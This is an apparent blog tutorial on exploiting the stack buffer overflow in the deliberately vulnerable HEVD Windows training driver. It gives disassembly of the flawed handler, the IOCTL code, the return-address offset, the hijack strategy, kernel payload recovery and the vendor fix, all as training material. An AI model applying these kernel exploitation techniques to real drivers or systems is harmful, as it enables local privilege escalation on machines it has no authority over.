12 minutes
Hacksys Extreme Vulnerable Driver(HEVD) Windows Driver Exploitation - Stack Buffer Overflow
Table of Contents
Brief
The vulnerability class in question that we are going to hunt for and exploit is a Stack Buffer Overflow
in HEVD.sys
Windows
driver compiled without stack cookie/canary(/GS
Buffer Security Check) or StackGuard
mitigation. We are also going to look at productization and stabilization of the exploit later on.
We are only going to consider
Intel 64
(64-bit version of thex86
ISA
) targets in this blog post unless explicitly stated otherwise.
Vulnerability
First off, we should grab the latest version of the HEVD binary that we are going to exploit. I am going to use HEVD v3.00
.
Our next step would be to of course load the vulnerable version of the binary in IDA Pro
for static analysis. You could also use IDA Free/Demo/Home
or any other disassembler of your choice. Hex-Rays
decompiler is not strictly necessary although it would certainly be helpful.
We will be utilizing the provided PDB
symbol file which will greatly aid us in RE
and later on we will also take a look at the patch to discuss how the vulnerability was fixed.
An useful
IDA Pro
plugin for initial automated analysis ofWindows
drivers is DriverBuddyReloaded by VoidSec. It may provide us with a useful starting point and save some time in the process.
After opening the binary, we land in GsDriverEntry()
routine which doesn’t look anything like the DriverEntry() routine that we are familiar with. It is actually inserted by the compiler when the code is compiled with the /GS compiler flag and performs some initialization to support the detection of buffer overruns.
We can simply follow the call to a function appropriately named here as DriverEntry_0()
. Now, this looks more like it! We can already see the device name string and the MS-DOS device name string that are initialized to nt!_UNICODE_STRING structures using nt!RtlInitUnicodeString() routine.
We can use Hex-Rays
decompiler to decompile this function and note three things that are of concern to us:
- Creation of the named device object for the driver using nt!IoCreateDevice() routine. Notably, it doesn’t use nt!IoCreateDeviceSecure() routine that lets us implement access control. This potentially implies that any process running on the system even one with a Low Integrity Level token can open a handle to this device object.
- Creation of the symbolic link object to the device by using nt!IoCreateSymbolicLink() routine and supplying the
MS-DOS
device name for the device object. This is necessary to work with the driver from a user-mode application. - Setting the pointer to the DispatchDeviceControl dispatch routine in the
MajorFunction[]
array of the driver object to handleIRP_MJ_DEVICE_CONTROL
requests. For more information, refer to theMSDN
documentation on the nt!_DRIVER_OBJECT structure and IRP_MJ_DEVICE_CONTROL.
Now that we have found the driver dispatch routine to handle IRPs with I/O
function code of IRP_MJ_DEVICE_CONTROL
, we can start looking for the various functionalities implemented by the driver that we can trigger from a user-mode client application by sending the appropriate IOCTL code and I/O
parameters using kernel32!DeviceIoControl() routine.
And scrolling down a bit we found a call to IOCTL
handler of stack buffer overflow thanks to the helpful debug prints baked into the code(yes, this happens sometimes in production builds too!)
But what is the IOCTL
code through which we can take this code path?
Well, we just scroll up a bit in the control flow graph and spot some code that checks if ECX == 0x222003
and jumps to the location we highlighted above if the condition is true. Looks like we have found the IOCTL
code to trigger a stack buffer overflow!
We can now decode the IOCTL
code using OSR Online IOCTL Decoder.
The most notable fact about this is that it uses METHOD_NEITHER transfer type which means the I/O
manager does not validate the buffers which reside in UVAS
and are not copied to KVAS
. It is up to the driver to implement proper sanity checks to determine if the buffers are safe to access from the driver.
Let’s take a gander at the disassembly and decompilation of the IOCTL
handler of stack buffer overflow using IDA Pro
and Hex-Rays
decompiler:
PAGE:0000000140086594 ; =============== S U B R O U T I N E =======================================
PAGE:0000000140086594
PAGE:0000000140086594
PAGE:0000000140086594 ; int __fastcall BufferOverflowStackIoctlHandler(_IRP *Irp, _IO_STACK_LOCATION *IrpSp)
PAGE:0000000140086594 BufferOverflowStackIoctlHandler proc near
PAGE:0000000140086594 ; CODE XREF: IrpDeviceIoCtlHandler+1D6↑p
PAGE:0000000140086594 ; DATA XREF: .pdata:0000000140084144↑o
PAGE:0000000140086594 Irp = rcx
PAGE:0000000140086594 IrpSp = rdx
PAGE:0000000140086594 000 sub rsp, 28h
PAGE:0000000140086598 028 mov Irp, [IrpSp+20h] ; UserBuffer
PAGE:000000014008659C 028 mov eax, 0C0000001h
PAGE:00000001400865A1 028 mov edx, [IrpSp+10h] ; Size
PAGE:00000001400865A4 028 test Irp, Irp
PAGE:00000001400865A7 028 jz short loc_1400865AE
PAGE:00000001400865A9 028 call TriggerBufferOverflowStack
PAGE:00000001400865AE
PAGE:00000001400865AE loc_1400865AE: ; CODE XREF: BufferOverflowStackIoctlHandler+13↑j
PAGE:00000001400865AE 028 add rsp, 28h
PAGE:00000001400865B2 000 retn
PAGE:00000001400865B2 BufferOverflowStackIoctlHandler endp
PAGE:00000001400865B2
PAGE:00000001400865B2 ; ---------------------------------------------------------------------------
The only thing this function does is extract the pointer to user’s input buffer and its length from the current I/O stack location which were copied as-is by the I/O
manager from the user-mode client application to the nt!_IRP
and its accompanying nt!_IO_STACK_LOCATION structure(s) without any form of checking and call HEVD!TriggerBufferOverflowStack()
routine with the extracted values as arguments.
It looks as though the hunt is finally over as we descend upon the function which is so helpfully named TriggerBufferOverflowStack()
:
PAGE:00000001400865B4 ; =============== S U B R O U T I N E =======================================
PAGE:00000001400865B4
PAGE:00000001400865B4
PAGE:00000001400865B4 ; __int64 __fastcall TriggerBufferOverflowStack(void *UserBuffer, size_t Size)
PAGE:00000001400865B4 TriggerBufferOverflowStack proc near ; CODE XREF: BufferOverflowStackIoctlHandler+15↑p
PAGE:00000001400865B4 ; DATA XREF: .pdata:0000000140084150↑o
PAGE:00000001400865B4
PAGE:00000001400865B4 KernelBuffer = dword ptr -818h
PAGE:00000001400865B4 var_18 = byte ptr -18h
PAGE:00000001400865B4 arg_0 = qword ptr 8
PAGE:00000001400865B4 arg_8 = qword ptr 10h
PAGE:00000001400865B4 arg_10 = qword ptr 18h
PAGE:00000001400865B4
PAGE:00000001400865B4 UserBuffer = rcx
PAGE:00000001400865B4 Size = rdx
PAGE:00000001400865B4 ; __unwind { // __C_specific_handler
PAGE:00000001400865B4 000 mov [rsp+arg_0], rbx
PAGE:00000001400865B9 000 mov [rsp+arg_8], rsi
PAGE:00000001400865BE 000 mov [rsp+arg_10], rdi
PAGE:00000001400865C3 000 push r12
PAGE:00000001400865C5 008 push r14
PAGE:00000001400865C7 010 push r15
PAGE:00000001400865C9 018 sub rsp, 820h
PAGE:00000001400865D0 838 mov rsi, Size
PAGE:00000001400865D3 838 mov rdi, UserBuffer
PAGE:00000001400865D6 838 xor ebx, ebx
PAGE:00000001400865D8 838 mov r12d, 800h
PAGE:00000001400865DE 838 mov r8d, r12d ; Size
PAGE:00000001400865E1 838 xor edx, edx ; Val
PAGE:00000001400865E3 838 lea UserBuffer, [rsp+838h+KernelBuffer] ; Dst
PAGE:00000001400865E8 838 call memset
PAGE:00000001400865ED 838 nop
PAGE:00000001400865EE
PAGE:00000001400865EE loc_1400865EE: ; DATA XREF: .rdata:00000001400025B0↑o
PAGE:00000001400865EE ; __try { // __except at $LN6_0 ; Alignment
PAGE:00000001400865EE 838 lea r8d, [rbx+1]
PAGE:00000001400865F2 838 mov edx, r12d ; Length
PAGE:00000001400865F5 838 mov UserBuffer, rdi ; Address
PAGE:00000001400865F8 838 call cs:__imp_ProbeForRead
PAGE:00000001400865FE 838 mov r9, rdi
PAGE:0000000140086601 838 lea r8, aUserbuffer0xP ; "[+] UserBuffer: 0x%p\n"
PAGE:0000000140086608 838 lea r15d, [rbx+3]
PAGE:000000014008660C 838 mov edx, r15d ; Level
PAGE:000000014008660F 838 lea r14d, [rbx+4Dh]
PAGE:0000000140086613 838 mov ecx, r14d ; ComponentId
PAGE:0000000140086616 838 call cs:__imp_DbgPrintEx
PAGE:000000014008661C 838 mov r9, rsi
PAGE:000000014008661F 838 lea r8, aUserbufferSize ; "[+] UserBuffer Size: 0x%X\n"
PAGE:0000000140086626 838 mov edx, r15d ; Level
PAGE:0000000140086629 838 mov ecx, r14d ; ComponentId
PAGE:000000014008662C 838 call cs:__imp_DbgPrintEx
PAGE:0000000140086632 838 lea r9, [rsp+838h+KernelBuffer]
PAGE:0000000140086637 838 lea r8, aKernelbuffer0x ; "[+] KernelBuffer: 0x%p\n"
PAGE:000000014008663E 838 mov edx, r15d ; Level
PAGE:0000000140086641 838 mov ecx, r14d ; ComponentId
PAGE:0000000140086644 838 call cs:__imp_DbgPrintEx
PAGE:000000014008664A 838 mov r9d, r12d
PAGE:000000014008664D 838 lea r8, aKernelbufferSi ; "[+] KernelBuffer Size: 0x%X\n"
PAGE:0000000140086654 838 mov edx, r15d ; Level
PAGE:0000000140086657 838 mov ecx, r14d ; ComponentId
PAGE:000000014008665A 838 call cs:__imp_DbgPrintEx
PAGE:0000000140086660 838 lea r8, aTriggeringBuff_2 ; "[+] Triggering Buffer Overflow in Stack"...
PAGE:0000000140086667 838 mov edx, r15d ; Level
PAGE:000000014008666A 838 mov ecx, r14d ; ComponentId
PAGE:000000014008666D 838 call cs:__imp_DbgPrintEx
PAGE:0000000140086673 838 mov r8, rsi ; MaxCount
PAGE:0000000140086676 838 mov Size, rdi ; Src
PAGE:0000000140086679 838 lea UserBuffer, [rsp+838h+KernelBuffer] ; Dst
PAGE:000000014008667E 838 call memmove
PAGE:0000000140086683 838 jmp short loc_1400866A0
PAGE:0000000140086683 ; } // starts at 1400865EE
PAGE:0000000140086685 ; ---------------------------------------------------------------------------
PAGE:0000000140086685
PAGE:0000000140086685 $LN6_0: ; DATA XREF: .rdata:00000001400025B0↑o
PAGE:0000000140086685 ; __except(1) // owned by 1400865EE
PAGE:0000000140086685 838 mov ebx, eax
PAGE:0000000140086687 838 mov r9d, eax
PAGE:000000014008668A 838 lea r8, aExceptionCode0 ; "[-] Exception Code: 0x%X\n"
PAGE:0000000140086691 838 mov edx, 3 ; Level
PAGE:0000000140086696 838 lea ecx, [Size+4Ah] ; ComponentId
PAGE:0000000140086699 838 call cs:__imp_DbgPrintEx
PAGE:000000014008669F 838 nop
PAGE:00000001400866A0
PAGE:00000001400866A0 loc_1400866A0: ; CODE XREF: TriggerBufferOverflowStack+CF↑j
PAGE:00000001400866A0 838 mov eax, ebx
PAGE:00000001400866A2 838 lea r11, [rsp+838h+var_18]
PAGE:00000001400866AA 838 mov rbx, [r11+20h]
PAGE:00000001400866AE 838 mov rsi, [r11+28h]
PAGE:00000001400866B2 838 mov rdi, [r11+30h]
PAGE:00000001400866B6 838 mov rsp, r11
PAGE:00000001400866B9 018 pop r15
PAGE:00000001400866BB 010 pop r14
PAGE:00000001400866BD 008 pop r12
PAGE:00000001400866BF 000 retn
PAGE:00000001400866BF ; } // starts at 1400865B4
PAGE:00000001400866BF TriggerBufferOverflowStack endp
The issue here(highlighted in red for your reading pleasure) is apparent. On one hand, we have a local variable called Dst
and it is an array of type CHAR
consisting of 0n2048/0x800
elements occupying 0n2048 * sizeof(CHAR) = 0n2048/0x800
bytes on the stack and on the other hand, we have an unsafe routine such as memmove() taking attacker-controlled input data and size as arguments and copying it to the buffer on the stack without any form of size validation thus making it possible to overflow its bounds and corrupt adjacent data on the stack.
This bug appears to be exploitable in practice too because the input data and the input size both appear to be completely attacker-controlled without any constraints.
Exploitation and Stabilization
Our objective is exploiting this vulnerability to achieve arbitrary code execution in kernel-mode and we previously said that we can corrupt data on the stack using the vulnerability but how does corrupting random stack data help us in any way except maybe causing a glorious bugcheck on the device?
Well, as you might know, the call instruction pushes the return address(address of the subsequent instruction following the call
) on the stack before changing the (really)extended instruction pointer(EIP
/RIP
) value to the call
target and the ret instruction pops the value at the top of the stack into EIP
/RIP
. They are both control flow instructions as they can be used to control the instruction pointer(a pointer to the next instruction to execute).
So what if we could overwrite a retaddr
on the stack with the address of our payload buffer that we control? And when the function returns we are going to have our payload executed instead!
Now that we have defined our exploitation strategy, let’s discuss some potential problems and how we resolve them:
- Legacy and modern exploit mitigations such as
KASLR
,DEP
,GS Cookie
,KPP/PatchGuard
,SMEP
,SMAP
,KPTI
,kCFG
,HyperGuard
,HVCI
,KCET
etc.
- Some of them are not applicable here, some can be entirely avoided or bypassed and others will completely thwart us. We will discuss them in detail on a case-by-case basis.
- Where do we put our payload?
- User Virtual Address Space(
UVAS
).
- What happens if our payload
UVA
gets paged out before we are done?
- Lock the payload pages into physical memory thus ensuring that they cannot be written to the pagefile.
- How do we know how much stack data to corrupt to cause a precise overwrite of the
retaddr
and not any other arbitrary data on the stack which may lead to system instability?
- We must first draw the complete stack layout with the help of the disassembly shown above in order to understand this.
Note that the offsets here are relative to the stack base containing the
retaddr
. From this diagram, we can see that after we overflow the bounds of the bufferDst
stored on stack into three non-volatile register contents also saved on stack we can finally overwrite theretaddr
(ergo,retaddr
offset =0x800 + 0x8 * 0n3
=0x818
). I’ve seen some writeups use cyclic pattern generators for this purpose so feel free to confirm the above using Overflow Exploit Pattern Generator - Online Tool by @zerosum0x0. One thing to mention here is that we irreparably trash three saved non-volatile register contents on the stack(R12
,R14
, andR15
) to get to theretaddr
which is not ideal for stability but also unavoidable in our case.
- How do we pick up the original control flow and return back to user-mode after our payload finishes executing now that we have utterly messed up the stack?
- There are quite a few approaches to deal with kernel-mode payload recovery or transitioning from
ring 0
toring 3
after successful exploitation, however, it is hard to find a universal method that is equally reliable or is the most optimal for every scenario. Ergo, we will again discuss them in detail on a case-by-case basis.
Case I
Intel OS Guard
/SMEP
not present,KVA Shadow
/KPTI
disabled- Target
Windows 7
OS
orOS
>Windows 7
but running on olderIntel
hardware(μarch <Ivy Bridge
)Intel
processor that is not vulnerable toRogue Data Cache Load
/Meltdown
/Variant 3
/CVE-2017-5754
or without theMeltdown
patch(KPTI
disabled)
- Proof of Concept
This is the easiest case to deal with as there are no kernel security mitigations to defeat, so we will start with this one(baby steps!)
Kernel-mode Payload Recovery
In order to understand the most optimal approach for our case(and also perhaps the easiest), we need to consult the disassembly of the caller of HEVD!TriggerBufferOverflowStack()
and see the location where our callee would have normally returned had the control flow not been hijacked to execute our payload.
Once we identify that, we can append the code stub(highlighted in red) to our payload so that we can execute it ourselves and return to IRP_MJ_DEVICE_CONTROL
IRP
handler which is eventually going to return out of kernel-mode without crashing the system.
Demo
Here is a screenshot demonstrating successful exploitation of this vulnerability on a fully updated Windows 7
system with a modified PINKPANTHER payload to achieve Local Privilege Escalation(LPE)
:
Patch Analysis
So what was the fix? We can load the “secure” version of the binary into IDA Pro
to find out.
Quite simple really as it turns out, by enforcing stringent bounds. As you might notice, the size parameter to memmove()
is no longer attacker-controlled and it’s fixed to sizeof(KernelBuffer)
bytes which means that we will no longer be able to overrun the contents of this buffer on the stack beyond its bounds.
Honourable Mention
Throughout this blog post I have assumed that the readers are already familiar with setting up a Windows
test VM
with full kernel debugging support and have done so but if that’s not the case, I’d implore you to give this a read: CodeMachine System setup for kernel development and debugging guide
2388 Words
2023-01-11 01:00